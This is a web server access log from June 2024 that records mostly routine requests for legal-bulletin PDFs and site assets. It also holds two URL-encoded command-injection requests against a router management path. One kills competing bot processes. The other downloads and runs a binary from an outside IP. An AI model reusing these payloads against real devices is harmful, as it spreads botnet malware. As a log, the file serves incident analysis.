47.128.48.110 - - [29/Jun/2024:00:13:34 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
47.128.48.110 - - [29/Jun/2024:00:13:34 -0500] "GET /BLA/boletinlegal/js/jquery1.js HTTP/1.1" 200 29846
216.244.66.195 - - [29/Jun/2024:00:13:41 -0500] "GET /BLA/resoluciones/AUTOS%202021/5861.pdf HTTP/1.1" 200 399728
201.245.192.253 - - [29/Jun/2024:00:13:55 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:00:14:00 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
141.98.83.197 - - [29/Jun/2024:00:14:09 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 1018
141.98.83.197 - - [29/Jun/2024:00:14:10 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 1018
216.244.66.195 - - [29/Jun/2024:00:14:10 -0500] "GET /BLA/resoluciones/AUTOS%202022/6029.pdf HTTP/1.1" 200 351108
47.128.122.176 - - [29/Jun/2024:00:14:17 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=5090.pdf HTTP/1.1" 200 2740
47.128.114.64 - - [29/Jun/2024:00:14:36 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=3787.pdf HTTP/1.1" 200 2740
66.249.66.13 - - [29/Jun/2024:00:14:36 -0500] "GET /robots.txt HTTP/1.1" 404 1018
